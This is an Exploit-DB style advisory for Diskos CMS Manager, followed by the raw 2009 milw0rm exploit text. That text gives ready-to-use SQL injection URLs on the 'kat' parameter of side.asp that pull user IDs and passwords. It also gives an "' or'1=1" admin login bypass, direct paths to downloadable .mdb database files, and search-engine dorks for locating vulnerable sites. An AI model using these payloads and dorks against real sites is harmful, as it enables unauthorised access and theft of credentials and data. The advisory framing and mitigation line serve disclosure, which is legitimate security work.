Diskos CMS Manager & multiple vulnerabilities

vendor:

Diskos CMS Manager

by:

AnGeL25dZ

7.5

CVSS

HIGH

SQL Injection & admin byapass & database disclosure

89, 287, 522

CWE

Product Name: Diskos CMS Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Diskos CMS Manager & multiple vulnerabilities

Users can exploit the vulnerability by sending a malicious SQL query to the vulnerable parameter 'kat' in the 'side.asp' script. This can be exploited to disclose the database content. An attacker can also bypass the authentication process by sending a malicious SQL query to the vulnerable parameter 'kat' in the 'side.asp' script. This can be exploited to gain administrative access.

Mitigation:

The vendor has released a patch to address this issue. It is advised to upgrade to the latest version of the product.

Source

Exploit-DB raw data:

************************************************************
**         Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
**  Prodcut:		Diskos CMS Manager  
**  Home   : 		http://www.diskos.dk
**  Vunlerability :	SQL Injection & admin byapass & database disclosure 
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of H-T (http://h-t.cc/cc)
**		 All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**  
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
************************************************************** 
**  
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb 
** 		    artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************

# milw0rm.com [2009-03-30]